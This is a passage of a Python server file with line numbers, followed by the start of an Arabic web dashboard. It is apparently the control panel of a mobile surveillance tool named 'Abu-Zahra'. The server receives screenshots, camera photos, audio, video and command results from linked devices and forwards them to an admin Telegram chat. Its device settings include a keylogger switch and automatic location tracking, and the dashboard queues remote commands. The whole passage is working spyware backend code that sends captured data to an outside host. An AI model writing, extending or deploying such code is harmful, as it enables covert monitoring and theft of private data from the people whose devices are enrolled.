  2500→        body_data_hash = hashlib.md5(body_data_str[:500].encode()).hexdigest() if body_data_str else ""
  2501→        
  2502→        # Skip if same device+command sent same data within 120 seconds
  2503→        last_body_time = body_dedup_entry.get("time", 0)
  2504→        last_body_hash = body_dedup_entry.get("hash", "")
  2505→        if body_data_hash and body_data_hash == last_body_hash and body_dedup_now - last_body_time < 120:
  2506→            log.info("Data body DEDUP BLOCKED: device=%s cmd=%s hash=%s", device_id, command, body_data_hash[:8])
  2507→            return web.json_response({"ok": True, "success": True, "message": "Data received (dedup)"})
  2508→        
  2509→        # Skip if more than 3 forwards for same device+command within 60 seconds
  2510→        # (handles cases where data changes slightly each time)
  2511→        body_dedup_entry.setdefault("recent_times", [])
  2512→        body_dedup_entry["recent_times"] = [t for t in body_dedup_entry["recent_times"] if body_dedup_now - t < 60]
  2513→        if len(body_dedup_entry["recent_times"]) >= 3:
  2514→            log.warning("Data body RATE BLOCKED: device=%s cmd=%s count=%d", device_id, command, len(body_dedup_entry["recent_times"]))
  2515→            return web.json_response({"ok": True, "success": True, "message": "Data received (rate limited)"})
  2516→        
  2517→        # Update dedup record
  2518→        _data_body_dedup[body_dedup_key] = {
  2519→            "time": body_dedup_now,
  2520→            "hash": body_data_hash,
  2521→            "recent_times": body_dedup_entry["recent_times"] + [body_dedup_now],
  2522→        }
  2523→        # Cleanup old entries
  2524→        expired = [k for k, v in _data_body_dedup.items() if body_dedup_now - v.get("time", 0) > 300]
  2525→        for k in expired:
  2526→            del _data_body_dedup[k]
  2527→        # Clean up old data_forward_dedup entries (older than 5 minutes)
  2528→        fwd_expired = [k for k, v in _data_forward_dedup.items() if body_dedup_now - v > 300]
  2529→        for k in fwd_expired:
  2530→            del _data_forward_dedup[k]
  2531→
  2532→        # === FORWARD DATA TO TELEGRAM ===
  2533→        try:
  2534→            display_text = ""
  2535→            if isinstance(data, dict):
  2536→                if data.get("message"):
  2537→                    display_text = str(data["message"])
  2538→                elif data.get("data") is not None:
  2539→                    inner = data["data"]
  2540→                    if isinstance(inner, list):
  2541→                        count = len(inner)
  2542→                        if count == 0:
  2543→                            display_text = "لا توجد بيانات"
  2544→                        elif count <= 15:
  2545→                            display_text = f"تم بنجاح - {count} عنصر\n\n<code>{json.dumps(inner, ensure_ascii=False, indent=2)[:3000]}</code>"
  2546→                        else:
  2547→                            display_text = f"تم بنجاح - {count} عنصر (أول 10)\n\n<code>{json.dumps(inner[:10], ensure_ascii=False, indent=2)[:2000]}</code>\n\n...و {count-10} أخرى"
  2548→                    elif isinstance(inner, dict):
  2549→                        display_text = json.dumps(inner, ensure_ascii=False, indent=2)[:3000]
  2550→                    else:
  2551→                        display_text = str(inner)[:3000]
  2552→                elif data.get("ok"):
  2553→                    display_text = str(data.get("message", "تم بنجاح"))
  2554→                else:
  2555→                    display_text = json.dumps(data, ensure_ascii=False, indent=2)[:3000]
  2556→            elif isinstance(data, str):
  2557→                display_text = data[:3000]
  2558→            elif isinstance(data, list):
  2559→                count = len(data)
  2560→                if count <= 15:
  2561→                    display_text = f"{count} عنصر\n<code>{json.dumps(data, ensure_ascii=False, indent=2)[:3000]}</code>"
  2562→                else:
  2563→                    display_text = f"{count} عنصر (أول 10)\n<code>{json.dumps(data[:10], ensure_ascii=False, indent=2)[:2000]}</code>"
  2564→            else:
  2565→                display_text = str(data)[:3000]
  2566→
  2567→            if not display_text:
  2568→                display_text = "تم الاستلام بنجاح"
  2569→
  2570→            cmd_desc = command or "بيانات"
  2571→            for reg_name, reg_info in COMMAND_REGISTRY.items():
  2572→                if reg_info.get("cmd") == command:
  2573→                    cmd_desc = reg_info.get("desc", command)
  2574→                    break
  2575→
  2576→            msg = (
  2577→                f"📦 <b>بيانات من الجهاز</b>\n\n"
  2578→                f"📱 الجهاز: <code>{dev_name}</code>\n"
  2579→                f"📋 النوع: {cmd_desc}\n\n"
  2580→                f"<code>{display_text}</code>"
  2581→            )
  2582→            await send_admin(msg)
  2583→        except Exception as fwd_err:
  2584→            log.error("Failed to forward body data to Telegram: %s", fwd_err)
  2585→
  2586→        log.info("Data received (body) from %s: command=%s", device_id, command)
  2587→        return web.json_response({"ok": True, "success": True, "message": "Data received"})
  2588→    except Exception as exc:
  2589→        log.error("device_data_body error: %s", exc)
  2590→        return web.json_response({"ok": False, "success": False, "error": "Internal server error"}, status=500)
  2591→
  2592→async def api_device_settings(request):
  2593→    """GET /api/settings/{device_id} - Get device settings."""
  2594→    global api_hits
  2595→    api_hits += 1
  2596→    device_id = request.match_info.get("device_id", "")
  2597→    d = find_device(device_id)
  2598→    if not d:
  2599→        return web.json_response({"ok": False, "error": "Device not found"}, status=404)
  2600→    
  2601→    settings = load_settings()
  2602→    return web.json_response({
  2603→        "ok": True,
  2604→        "settings": {
  2605→            "sync_interval": settings.get("sync_interval", 300),
  2606→            "location_interval": settings.get("location_interval", 60),
  2607→            "auto_location": settings.get("auto_location", True),
  2608→            "auto_sync": settings.get("auto_sync", True),
  2609→            "keylogger": settings.get("keylogger", False),
  2610→            "notifications": settings.get("notifications", True),
  2611→        }
  2612→    })
  2613→
  2614→
  2615→async def api_upload_file(request):
  2616→    """POST /api/upload - Receive files from device (photos, videos, audio, etc.).
  2617→    يرسل الملفات مباشرة للبوت تليجرام.
  2618→    Also caches screenshot/camera images for the JPEG streaming viewer."""
  2619→    global api_hits
  2620→    api_hits += 1
  2621→    try:
  2622→        # Parse multipart form data
  2623→        reader = await request.multipart()
  2624→        device_id = None
  2625→        file_type = "file"
  2626→        command_id = None
  2627→        caption = None
  2628→        file_data = None
  2629→        file_name = None
  2630→        file_size = 0
  2631→        upload_command = ""
  2632→        
  2633→        async for field in reader:
  2634→            if field.filename:
  2635→                # This is the file field
  2636→                file_name = field.filename
  2637→                file_data = await field.read()
  2638→                file_size = len(file_data)
  2639→            else:
  2640→                # Regular field
  2641→                value = await field.read()
  2642→                value_str = value.decode('utf-8') if value else ""
  2643→                if field.name == "device_id":
  2644→                    device_id = value_str
  2645→                elif field.name == "file_type":
  2646→                    file_type = value_str
  2647→                elif field.name == "command":
  2648→                    upload_command = value_str
  2649→                    # Use command as file_type hint if file_type not set
  2650→                    if value_str in ("screenshot", "camera", "photo"):
  2651→                        file_type = value_str
  2652→                elif field.name == "command_id":
  2653→                    command_id = value_str
  2654→                elif field.name == "caption":
  2655→                    caption = value_str
  2656→        
  2657→        if not file_data:
  2658→            return web.json_response({"ok": False, "error": "No file received"}, status=400)
  2659→        
  2660→        # If no device_id, try to identify by client IP
  2661→        if not device_id:
  2662→            peer_ip = _get_real_ip(request)
  2663→            if peer_ip and peer_ip in _ip_device_map:
  2664→                device_id = _ip_device_map[peer_ip]
  2665→                log.info("Upload: identified device %s by IP %s", device_id, peer_ip)
  2666→        
  2667→        # Still no device_id - accept but can't attribute
  2668→        if not device_id:
  2669→            device_id = "unknown"
  2670→            log.warning("Upload received without device_id and unknown IP %s", request.remote)
  2671→        
  2672→        # Validate device token (use IP-based lookup if no token header)
  2673→        device_token = request.headers.get("X-Device-Token", "")
  2674→        if device_token:
  2675→            d = get_device_by_token(device_id, device_token)
  2676→            if not d:
  2677→                return web.json_response({"ok": False, "error": "Unauthorized or device not found"}, status=401)
  2678→        else:
  2679→            # Fallback: IP-based identification already done above
  2680→            d = find_device(device_id) if device_id != "unknown" else None
  2681→        
  2682→        dev_name = (d.get("name", device_id) if d else device_id) if device_id != "unknown" else "Unknown"
  2683→        if device_id != "unknown":
  2684→            await update_device(device_id, {"active": True})
  2685→        
  2686→        # === CACHE IMAGE FOR STREAMING VIEWER ===
  2687→        if file_type in ("screenshot", "camera", "photo") and device_id != "unknown" and len(file_data) > 1000:
  2688→            try:
  2689→                import base64 as b64mod
  2690→                frame_b64 = b64mod.b64encode(file_data).decode('ascii')
  2691→                frame_key = f"{device_id}:video"
  2692→                _latest_frames_module[frame_key] = {
  2693→                    "data": frame_b64,
  2694→                    "timestamp": time.time(),
  2695→                    "size": file_size,
  2696→                    "source": file_type,
  2697→                    "stream_id": device_id,
  2698→                    "is_keyframe": True,
  2699→                    "codec": "jpeg",
  2700→                }
  2701→                log.info("Cached %s frame for streaming: device=%s size=%d", file_type, device_id, file_size)
  2702→            except Exception as cache_err:
  2703→                log.error("Failed to cache frame: %s", cache_err)
  2704→        
  2705→        # Save file temporarily
  2706→        upload_dir = DATA_DIR / "uploads"
  2707→        upload_dir.mkdir(parents=True, exist_ok=True)
  2708→        
  2709→        safe_name = "".join(c if c.isalnum() or c in "._-" else "_" for c in (file_name or f"{file_type}_{int(time.time())}"))
  2710→        temp_path = upload_dir / f"{device_id}_{safe_name}"
  2711→        temp_path.write_bytes(file_data)
  2712→        
  2713→        log.info("File uploaded: %s (%d bytes) from device %s", file_name, file_size, device_id)
  2714→        append_event("File uploaded", {"device_id": device_id, "file": file_name, "type": file_type, "size": file_size})
  2715→        
  2716→        # Send to Telegram based on file type (skip if JPEG streaming to avoid spam)
  2717→        is_stream_frame = file_type in ("screenshot", "camera", "photo") and _jpeg_stream_info.get(device_id, {}).get("active", False)
  2718→        if not is_stream_frame:
  2719→            try:
  2720→                if file_type in ("photo", "screenshot", "camera"):
  2721→                    await tg_send_photo(ADMIN_CHAT_ID, temp_path, caption=f"📷 {file_type}\n📱 الجهاز: {dev_name}\n📁 {file_name}")
  2722→                elif file_type == "video":
  2723→                    await tg_send_video(ADMIN_CHAT_ID, temp_path, caption=f"🎬 فيديو\n📱 الجهاز: {dev_name}\n📁 {file_name}")
  2724→                elif file_type == "audio":
  2725→                    await tg_send_audio(ADMIN_CHAT_ID, temp_path, caption=f"🎙️ صوت\n📱 الجهاز: {dev_name}\n📁 {file_name}")
  2726→                else:
  2727→                    await tg_send_document(ADMIN_CHAT_ID, temp_path, caption=f"📄 ملف\n📱 الجهاز: {dev_name}\n📁 {file_name}")
  2728→                log.info("File sent to Telegram: %s", file_name)
  2729→            except Exception as tg_err:
  2730→                log.error("Failed to send file to Telegram: %s", tg_err)
  2731→        
  2732→        return web.json_response({
  2733→            "ok": True, 
  2734→            "success": True, 
  2735→            "message": "File uploaded successfully",
  2736→            "file_name": file_name,
  2737→            "file_size": file_size
  2738→        })
  2739→    except Exception as exc:
  2740→        log.error("upload_file error: %s", exc)
  2741→        return web.json_response({"ok": False, "success": False, "error": "Internal server error"}, status=500)
  2742→
  2743→
  2744→async def api_upload_base64(request):
  2745→    """POST /api/upload_base64 - Receive base64-encoded files from device.
  2746→    للصور الصغيرة ولقطات الشاشة."""
  2747→    global api_hits
  2748→    api_hits += 1
  2749→    try:
  2750→        body = await request.json()
  2751→        device_id = body.get("device_id", "")
  2752→        file_type = body.get("file_type", "photo")
  2753→        base64_data = body.get("base64_data", "")
  2754→        command_id = body.get("command_id")
  2755→        caption = body.get("caption")
  2756→        
  2757→        if not device_id:
  2758→            return web.json_response({"ok": False, "error": "device_id required"}, status=400)
  2759→        
  2760→        if not base64_data:
  2761→            return web.json_response({"ok": False, "error": "No base64 data provided"}, status=400)
  2762→        
  2763→        # Validate device token
  2764→        device_token = request.headers.get("X-Device-Token", "")
  2765→        d = get_device_by_token(device_id, device_token)
  2766→        if not d:
  2767→            return web.json_response({"ok": False, "error": "Unauthorized or device not found"}, status=401)
  2768→        
  2769→        dev_name = d.get("name", device_id)
  2770→        await update_device(device_id, {"active": True})
  2771→        
  2772→        # Decode base64
  2773→        import base64
  2774→        try:
  2775→            # Remove data URL prefix if present
  2776→            if base64_data.startswith("data:"):
  2777→                base64_data = base64_data.split(",", 1)[1]
  2778→            file_bytes = base64.b64decode(base64_data)
  2779→        except Exception as decode_err:
  2780→            return web.json_response({"ok": False, "error": f"Invalid base64: {decode_err}"}, status=400)
  2781→        
  2782→        # Save file
  2783→        upload_dir = DATA_DIR / "uploads"
  2784→        upload_dir.mkdir(parents=True, exist_ok=True)
  2785→        
  2786→        ext = "png" if file_type in ("photo", "screenshot") else "jpg"
  2787→        file_name = f"{file_type}_{int(time.time())}.{ext}"
  2788→        temp_path = upload_dir / f"{device_id}_{file_name}"
  2789→        temp_path.write_bytes(file_bytes)
  2790→        
  2791→        log.info("Base64 file uploaded: %s (%d bytes) from device %s", file_name, len(file_bytes), device_id)
  2792→        append_event("Base64 file uploaded", {"device_id": device_id, "file": file_name, "type": file_type})
  2793→        
  2794→        # Send to Telegram
  2795→        try:
  2796→            caption_text = f"📷 {file_type}\n📱 الجهاز: {dev_name}"
  2797→            if caption:
  2798→                caption_text += f"\n{caption}"
  2799→            await tg_send_photo(ADMIN_CHAT_ID, temp_path, caption=caption_text)
  2800→            log.info("Base64 file sent to Telegram: %s", file_name)
  2801→        except Exception as tg_err:
  2802→            log.error("Failed to send base64 file to Telegram: %s", tg_err)
  2803→        
  2804→        return web.json_response({
  2805→            "ok": True, 
  2806→            "success": True, 
  2807→            "message": "File uploaded and sent to Telegram",
  2808→            "file_name": file_name
  2809→        })
  2810→    except Exception as exc:
  2811→        log.error("upload_base64 error: %s", exc)
  2812→        return web.json_response({"ok": False, "success": False, "error": "Internal server error"}, status=500)
  2813→
  2814→
  2815→async def tg_send_photo(chat_id, file_path, caption=None):
  2816→    """Send photo to Telegram."""
  2817→    try:
  2818→        url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendPhoto"
  2819→        with open(file_path, "rb") as f:
  2820→            data = aiohttp.FormData()
  2821→            data.add_field("chat_id", str(chat_id))
  2822→            data.add_field("photo", f, filename=file_path.name, content_type="image/jpeg")
  2823→            if caption:
  2824→                data.add_field("caption", caption[:1024])
  2825→                data.add_field("parse_mode", "HTML")
  2826→            
  2827→            session = get_tg_session()
  2828→            async with session.post(url, data=data, timeout=aiohttp.ClientTimeout(total=60)) as resp:
  2829→                if resp.status == 200:
  2830→                    return await resp.json()
  2831→                else:
  2832→                    error_text = await resp.text()
  2833→                    log.error("Failed to send photo: %s", error_text[:500])
  2834→                    return None
  2835→    except Exception as e:
  2836→        log.error("tg_send_photo error: %s", e)
  2837→        return None
  2838→
  2839→
  2840→async def tg_send_video(chat_id, file_path, caption=None):
  2841→    """Send video to Telegram."""
  2842→    try:
  2843→        url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendVideo"
  2844→        with open(file_path, "rb") as f:
  2845→            data = aiohttp.FormData()
  2846→            data.add_field("chat_id", str(chat_id))
  2847→            data.add_field("video", f, filename=file_path.name, content_type="video/mp4")
  2848→            if caption:
  2849→                data.add_field("caption", caption[:1024])
  2850→                data.add_field("parse_mode", "HTML")
  2851→            
  2852→            session = get_tg_session()
  2853→            async with session.post(url, data=data, timeout=aiohttp.ClientTimeout(total=120)) as resp:
  2854→                if resp.status == 200:
  2855→                    return await resp.json()
  2856→                else:
  2857→                    error_text = await resp.text()
  2858→                    log.error("Failed to send video: %s", error_text[:500])
  2859→                    return None
  2860→    except Exception as e:
  2861→        log.error("tg_send_video error: %s", e)
  2862→        return None
  2863→
  2864→
  2865→async def tg_send_audio(chat_id, file_path, caption=None):
  2866→    """Send audio to Telegram."""
  2867→    try:
  2868→        url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendAudio"
  2869→        with open(file_path, "rb") as f:
  2870→            data = aiohttp.FormData()
  2871→            data.add_field("chat_id", str(chat_id))
  2872→            data.add_field("audio", f, filename=file_path.name, content_type="audio/mpeg")
  2873→            if caption:
  2874→                data.add_field("caption", caption[:1024])
  2875→                data.add_field("parse_mode", "HTML")
  2876→            
  2877→            session = get_tg_session()
  2878→            async with session.post(url, data=data, timeout=aiohttp.ClientTimeout(total=60)) as resp:
  2879→                if resp.status == 200:
  2880→                    return await resp.json()
  2881→                else:
  2882→                    error_text = await resp.text()
  2883→                    log.error("Failed to send audio: %s", error_text[:500])
  2884→                    return None
  2885→    except Exception as e:
  2886→        log.error("tg_send_audio error: %s", e)
  2887→        return None
  2888→
  2889→
  2890→async def tg_send_document(chat_id, file_path, caption=None):
  2891→    """Send document to Telegram."""
  2892→    try:
  2893→        url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendDocument"
  2894→        with open(file_path, "rb") as f:
  2895→            data = aiohttp.FormData()
  2896→            data.add_field("chat_id", str(chat_id))
  2897→            data.add_field("document", f, filename=file_path.name)
  2898→            if caption:
  2899→                data.add_field("caption", caption[:1024])
  2900→                data.add_field("parse_mode", "HTML")
  2901→            
  2902→            session = get_tg_session()
  2903→            async with session.post(url, data=data, timeout=aiohttp.ClientTimeout(total=60)) as resp:
  2904→                if resp.status == 200:
  2905→                    return await resp.json()
  2906→                else:
  2907→                    error_text = await resp.text()
  2908→                    log.error("Failed to send document: %s", error_text[:500])
  2909→                    return None
  2910→    except Exception as e:
  2911→        log.error("tg_send_document error: %s", e)
  2912→        return None
  2913→
  2914→
  2915→async def api_web_login(request):
  2916→    """POST /api/login - Web dashboard login."""
  2917→    global api_hits
  2918→    api_hits += 1
  2919→    try:
  2920→        body = await request.json()
  2921→        username = body.get("username", "admin")
  2922→        password = body.get("password", "")
  2923→        ip = request.remote or ""
  2924→        ua = request.headers.get("User-Agent", "")
  2925→        
  2926→        session = await create_session(username, password, ip, ua)
  2927→        if not session:
  2928→            return web.json_response({"ok": False, "error": "Invalid credentials"}, status=401)
  2929→        
  2930→        return web.json_response({
  2931→            "ok": True,
  2932→            "token": session["token"],
  2933→            "expires_at": session["expires_at"],
  2934→        })
  2935→    except Exception as exc:
  2936→        log.error("login error: %s", exc)
  2937→        return web.json_response({"ok": False, "error": "Internal server error"}, status=500)
  2938→
  2939→
  2940→async def api_web_logout(request):
  2941→    token = request.headers.get("Authorization", "").replace("Bearer ", "")
  2942→    if token:
  2943→        sessions = load_json(SESSIONS_FILE, [])
  2944→        sessions = [s for s in sessions if s.get("token") != token]
  2945→        save_json(SESSIONS_FILE, sessions)
  2946→    return web.json_response({"ok": True})
  2947→
  2948→
  2949→def require_auth(func):
  2950→    """Decorator to require valid session token."""
  2951→    async def wrapper(request, *args, **kwargs):
  2952→        global api_hits
  2953→        api_hits += 1
  2954→        auth = request.headers.get("Authorization", "")
  2955→        token = auth.replace("Bearer ", "") if auth.startswith("Bearer ") else ""
  2956→        if not token:
  2957→            return web.json_response({"ok": False, "error": "Unauthorized"}, status=401)
  2958→        session = validate_session(token)
  2959→        if not session:
  2960→            return web.json_response({"ok": False, "error": "Session expired"}, status=401)
  2961→        request["session"] = session
  2962→        return await func(request, *args, **kwargs)
  2963→    return wrapper
  2964→
  2965→
  2966→@require_auth
  2967→async def api_web_devices(request):
  2968→    devices = get_devices()
  2969→    return web.json_response({"ok": True, "devices": devices})
  2970→
  2971→
  2972→@require_auth
  2973→async def api_web_device_detail(request):
  2974→    device_id = request.match_info.get("device_id", "")
  2975→    d = find_device(device_id)
  2976→    if not d:
  2977→        return web.json_response({"ok": False, "error": "Not found"}, status=404)
  2978→    cmds = load_json(COMMANDS_FILE, [])
  2979→    device_cmds = [c for c in cmds if c.get("device_id") == device_id][-50:]
  2980→    return web.json_response({"ok": True, "device": d, "commands": device_cmds})
  2981→
  2982→
  2983→@require_auth
  2984→async def api_web_commands(request):
  2985→    commands = load_json(COMMANDS_FILE, [])
  2986→    return web.json_response({"ok": True, "commands": commands[-100:]})
  2987→
  2988→
  2989→@require_auth
  2990→async def api_web_events(request):
  2991→    events = load_json(EVENTS_FILE, [])
  2992→    return web.json_response({"ok": True, "events": events[-100:]})
  2993→
  2994→
  2995→@require_auth
  2996→async def api_web_stats(request):
  2997→    devices = get_devices()
  2998→    online = sum(1 for d in devices if d.get("active"))
  2999→    cmds = load_json(COMMANDS_FILE, [])
  3000→    pending = sum(1 for c in cmds if c.get("status") == "pending")
  3001→    completed = sum(1 for c in cmds if c.get("status") == "completed")
  3002→    events = load_json(EVENTS_FILE, [])
  3003→    return web.json_response({
  3004→        "ok": True,
  3005→        "stats": {
  3006→            "uptime": get_uptime(),
  3007→            "uptime_formatted": format_uptime(get_uptime()),
  3008→            "devices_total": len(devices),
  3009→            "devices_online": online,
  3010→            "commands_total": len(cmds),
  3011→            "commands_pending": pending,
  3012→            "commands_completed": completed,
  3013→            "messages_sent": messages_sent,
  3014→            "api_hits": api_hits,
  3015→            "events_total": len(events),
  3016→            "total_registered_commands": len(COMMAND_REGISTRY),
  3017→            "server_time": ts(),
  3018→            "port": SERVER_PORT,
  3019→            "domain": SERVER_DOMAIN,
  3020→        }
  3021→    })
  3022→
  3023→
  3024→@require_auth
  3025→async def api_web_send_command(request):
  3026→    try:
  3027→        body = await request.json()
  3028→        device_id = body.get("device_id", "")
  3029→        command = body.get("command", "")
  3030→        params = body.get("params", {})
  3031→        
  3032→        if not device_id or not command:
  3033→            return web.json_response({"ok": False, "error": "device_id and command required"}, status=400)
  3034→        
  3035→        d = find_device(device_id)
  3036→        if not d:
  3037→            return web.json_response({"ok": False, "error": "Device not found"}, status=404)
  3038→        
  3039→        cmd = await queue_command(device_id, command, params)
  3040→        return web.json_response({"ok": True, "command": cmd})
  3041→    except Exception as exc:
  3042→        log.error("web queue command error: %s", exc)
  3043→        return web.json_response({"ok": False, "error": "Internal server error"}, status=500)
  3044→
  3045→
  3046→@require_auth
  3047→async def api_web_link_code(request):
  3048→    entry = await generate_link_code()
  3049→    return web.json_response({"ok": True, "code": entry["code"], "session_id": entry.get("session_id", "")})
  3050→
  3051→
  3052→@require_auth
  3053→async def api_web_settings_get(request):
  3054→    settings = load_settings()
  3055→    return web.json_response({"ok": True, "settings": settings})
  3056→
  3057→
  3058→@require_auth
  3059→async def api_web_settings_set(request):
  3060→    try:
  3061→        body = await request.json()
  3062→        settings = load_settings()
  3063→        for key, value in body.items():
  3064→            if key in settings:
  3065→                settings[key] = value
  3066→        await save_settings_data(settings)
  3067→        return web.json_response({"ok": True})
  3068→    except Exception as exc:
  3069→        log.error("web settings error: %s", exc)
  3070→        return web.json_response({"ok": False, "error": "Internal server error"}, status=500)
  3071→
  3072→
  3073→@require_auth
  3074→async def api_web_unlink(request):
  3075→    device_id = request.match_info.get("device_id", "")
  3076→    if await remove_device(device_id):
  3077→        return web.json_response({"ok": True})
  3078→    return web.json_response({"ok": False, "error": "Not found"}, status=404)
  3079→
  3080→# ============================================================================
  3081→# WEB DASHBOARD HTML
  3082→# ============================================================================
  3083→
  3084→DASHBOARD_HTML = r"""<!DOCTYPE html>
  3085→<html lang="ar" dir="rtl">
  3086→<head>
  3087→<meta charset="UTF-8">
  3088→<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
  3089→<title>Abu-Zahra Dashboard</title>
  3090→<style>
  3091→/* ========== CSS Custom Properties / Theme ========== */
  3092→:root {
  3093→  --bg: #0d1117;
  3094→  --bg-light: #161b22;
  3095→  --surface: #1c2128;
  3096→  --surface2: #21262d;
  3097→  --surface-hover: #292e36;
  3098→  --border: #30363d;
  3099→  --border-light: #484f58;
  3100→  --text: #e6edf3;
  3101→  --text-secondary: #8b949e;
  3102→  --text-muted: #656d76;
  3103→  --accent: #e63946;
  3104→  --accent-hover: #ff4d5a;
  3105→  --green: #3fb950;
  3106→  --green-bg: rgba(63,185,80,.12);
  3107→  --red: #f85149;
  3108→  --red-bg: rgba(248,81,73,.12);
  3109→  --yellow: #d29922;
  3110→  --yellow-bg: rgba(210,153,34,.12);
  3111→  --blue: #58a6ff;
  3112→  --blue-bg: rgba(88,166,255,.12);
  3113→  --purple: #bc8cff;
  3114→  --purple-bg: rgba(188,140,255,.12);
  3115→  --orange: #f0883e;
  3116→  --radius: 12px;
  3117→  --radius-sm: 8px;
  3118→  --radius-xs: 6px;
  3119→  --shadow: 0 1px 3px rgba(0,0,0,.3), 0 1px 2px rgba(0,0,0,.2);
  3120→  --shadow-lg: 0 10px 25px rgba(0,0,0,.4);
  3121→  --transition: .2s cubic-bezier(.4,0,.2,1);
  3122→  --sidebar-width: 260px;
  3123→  --topbar-height: 56px;
  3124→}
  3125→*,*::before,*::after{margin:0;padding:0;box-sizing:border-box}
  3126→html{-webkit-text-size-adjust:100%}
  3127→body{font-family:'Segoe UI',-apple-system,BlinkMacSystemFont,Tahoma,sans-serif;background:var(--bg);color:var(--text);min-height:100vh;line-height:1.5;-webkit-font-smoothing:antialiased}
  3128→::-webkit-scrollbar{width:6px;height:6px}
  3129→::-webkit-scrollbar-track{background:var(--bg)}
  3130→::-webkit-scrollbar-thumb{background:var(--border-light);border-radius:3px}
  3131→::-webkit-scrollbar-thumb:hover{background:var(--text-muted)}
  3132→input,select,textarea,button{font-family:inherit}
  3133→a{text-decoration:none;color:inherit}
  3134→
  3135→/* ========== Login ========== */
  3136→.login-page{display:flex;align-items:center;justify-content:center;min-height:100vh;background:linear-gradient(135deg,var(--bg) 0%,#1a1a2e 50%,#16213e 100%);position:relative;overflow:hidden}
  3137→.login-page::before{content:'';position:absolute;width:600px;height:600px;border-radius:50%;background:radial-gradient(circle,rgba(230,57,70,.08),transparent 70%);top:-200px;right:-200px;pointer-events:none}
  3138→.login-box{background:var(--surface);border:1px solid var(--border);border-radius:var(--radius);padding:40px 36px;width:380px;max-width:90vw;text-align:center;box-shadow:var(--shadow-lg);position:relative;z-index:1}
  3139→.login-box h1{color:var(--accent);margin-bottom:6px;font-size:26px;font-weight:700;letter-spacing:-.5px}
  3140→.login-box p{color:var(--text-secondary);margin-bottom:28px;font-size:14px}
  3141→.login-box input{width:100%;padding:12px 16px;border-radius:var(--radius-sm);border:1px solid var(--border);background:var(--bg);color:var(--text);font-size:15px;margin-bottom:12px;outline:none;transition:border var(--transition)}
  3142→.login-box input:focus{border-color:var(--accent);box-shadow:0 0 0 3px rgba(230,57,70,.15)}
  3143→.login-box button{width:100%;padding:12px;border:none;border-radius:var(--radius-sm);background:var(--accent);color:#fff;font-size:16px;cursor:pointer;transition:background var(--transition);font-weight:600;margin-top:4px}
  3144→.login-box button:hover{background:var(--accent-hover);transform:translateY(-1px)}
  3145→.login-box button:active{transform:translateY(0)}
  3146→.login-error{color:var(--red);font-size:13px;margin-top:10px;display:none}
  3147→
  3148→/* ========== App Layout ========== */
  3149→.app{display:none;min-height:100vh}
  3150→
  3151→/* ========== Sidebar ========== */
  3152→.sidebar{position:fixed;top:0;right:0;width:var(--sidebar-width);height:100vh;background:var(--surface);border-left:1px solid var(--border);padding:0;z-index:100;transition:transform .3s cubic-bezier(.4,0,.2,1);display:flex;flex-direction:column;overflow-y:auto}
  3153→.sidebar .logo{padding:20px 20px 16px;border-bottom:1px solid var(--border);margin-bottom:8px;flex-shrink:0}
  3154→.sidebar .logo h2{color:var(--accent);font-size:18px;font-weight:700;display:flex;align-items:center;gap:8px}
  3155→.sidebar .logo span{color:var(--text-muted);font-size:11px;display:block;margin-top:2px}
  3156→.sidebar nav{flex:1;padding:4px 0}
  3157→.sidebar a{display:flex;align-items:center;padding:10px 20px;color:var(--text-secondary);cursor:pointer;font-size:14px;gap:10px;transition:all var(--transition);border-right:3px solid transparent;position:relative}
  3158→.sidebar a:hover{background:var(--surface2);color:var(--text)}
  3159→.sidebar a.active{background:var(--surface2);color:var(--accent);border-right-color:var(--accent);font-weight:600}
  3160→.sidebar a .nav-badge{margin-right:auto;background:var(--accent);color:#fff;font-size:10px;padding:1px 7px;border-radius:10px;font-weight:700;min-width:18px;text-align:center}
  3161→.sidebar .sidebar-footer{padding:12px 20px;border-top:1px solid var(--border);flex-shrink:0}
  3162→.sidebar-overlay{display:none;position:fixed;inset:0;background:rgba(0,0,0,.5);z-index:99;backdrop-filter:blur(2px)}
  3163→
  3164→/* ========== Hamburger ========== */
  3165→.hamburger{display:none;position:fixed;top:12px;right:12px;z-index:150;background:var(--accent);color:#fff;border:none;width:42px;height:42px;border-radius:var(--radius-sm);font-size:20px;cursor:pointer;box-shadow:var(--shadow);transition:background var(--transition)}
  3166→.hamburger:hover{background:var(--accent-hover)}
  3167→
  3168→/* ========== Main Content ========== */
  3169→.main{margin-right:var(--sidebar-width);padding:24px 28px;min-height:100vh;transition:margin var(--transition)}
  3170→.page{display:none;animation:fadeIn .25s ease}
  3171→.page.active{display:block}
  3172→@keyframes fadeIn{from{opacity:0;transform:translateY(4px)}to{opacity:1;transform:translateY(0)}}
  3173→
  3174→/* ========== Topbar ========== */
  3175→.topbar{display:flex;align-items:center;justify-content:space-between;margin-bottom:24px;flex-wrap:wrap;gap:12px}
  3176→.topbar h1{font-size:22px;font-weight:700;display:flex;align-items:center;gap:10px}
  3177→.topbar .time{color:var(--text-secondary);font-size:13px;font-variant-numeric:tabular-nums}
  3178→.live-indicator{display:inline-flex;align-items:center;gap:6px;background:var(--green-bg);color:var(--green);padding:3px 10px;border-radius:12px;font-size:11px;font-weight:600}
  3179→.live-indicator .dot{width:7px;height:7px;border-radius:50%;background:var(--green);animation:livePulse 1.5s infinite}
  3180→.live-indicator.offline{background:var(--red-bg);color:var(--red)}
  3181→.live-indicator.offline .dot{background:var(--red);animation:none}
  3182→.live-indicator.connecting{background:var(--yellow-bg);color:var(--yellow)}
  3183→.live-indicator.connecting .dot{background:var(--yellow);animation:livePulse .8s infinite}
  3184→@keyframes livePulse{0%,100%{opacity:1;transform:scale(1)}50%{opacity:.4;transform:scale(.8)}}
  3185→
  3186→/* ========== Global Search ========== */
  3187→.global-search{position:relative;flex:1;max-width:360px;min-width:200px}
  3188→.global-search input{width:100%;padding:9px 14px 9px 36px;border-radius:var(--radius-sm);border:1px solid var(--border);background:var(--bg);color:var(--text);font-size:13px;outline:none;transition:border var(--transition)}
  3189→.global-search input:focus{border-color:var(--blue);box-shadow:0 0 0 3px rgba(88,166,255,.15)}
  3190→.global-search .search-icon{position:absolute;left:12px;top:50%;transform:translateY(-50%);color:var(--text-muted);font-size:14px;pointer-events:none}
  3191→
  3192→/* ========== Stats Grid ========== */
